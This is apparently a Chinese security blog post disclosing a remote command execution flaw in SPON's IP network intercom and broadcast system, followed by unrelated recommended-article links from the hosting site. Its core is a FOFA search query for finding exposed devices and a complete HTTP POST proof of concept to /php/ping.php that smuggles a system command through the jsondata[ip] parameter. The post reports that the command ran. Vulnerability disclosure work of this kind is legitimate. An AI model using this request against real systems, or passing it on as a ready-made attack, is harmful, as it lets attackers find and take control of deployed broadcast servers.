世邦通信股份有限公司IP网络对讲广播系统RCE

漏洞描述

SPON世邦IP网络广播系统采用的IPAudio™技术, 将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输的双向音频扩声系统。传统广播系统存在的音质不佳,传输距离有限,缺乏互动等问题。该系统设备使用简便,只需将终端接入计算机网络即可构成功能强大的数字广播系统,每个接入点无需单独布线,实现计算机网络、数字视频监控、公共广播的多网合一。其存在RCE漏洞,攻击者可通过此漏洞执行系统命令,进而控制服务器

漏洞复现

FOFA

复制代码
icon_hash="-1830859634"

POC

复制代码
POST /php/ping.php HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

jsondata%5Btype%5D=123&jsondata%5Bip%5D=ipconfig

bp 成功执行命令

相关推荐
virelin_Y.lin1 小时前
系统与网络安全------弹性交换网络(2)
网络·安全·web安全·链路聚合·lacp·eth-trunk
go_to_hacker4 小时前
安恒web安全春招实战
安全·web安全·网络安全·渗透测试
EasyDSS7 小时前
视频监控从安装到优化的技术指南,视频汇聚系统EasyCVR智能安防系统构建之道
大数据·网络·网络协议·音视频
rufeike7 小时前
UDP协议理解
网络·网络协议·udp
江理不变情8 小时前
海思ISP调试记录
网络·接口隔离原则
世界尽头与你8 小时前
【安全扫描器原理】网络扫描算法
网络·安全
AI拉呱_8 小时前
医院行业等保2.0案例
安全·web安全
GKoSon8 小时前
加入RPC shell指令 温箱长时间监控
网络·网络协议·rpc
2301_810154559 小时前
纯真社区IP库离线版发布更新
web安全
hgdlip9 小时前
关闭IP属地显示会影响账号的正常使用吗
网络·网络协议·tcp/ip·ip属地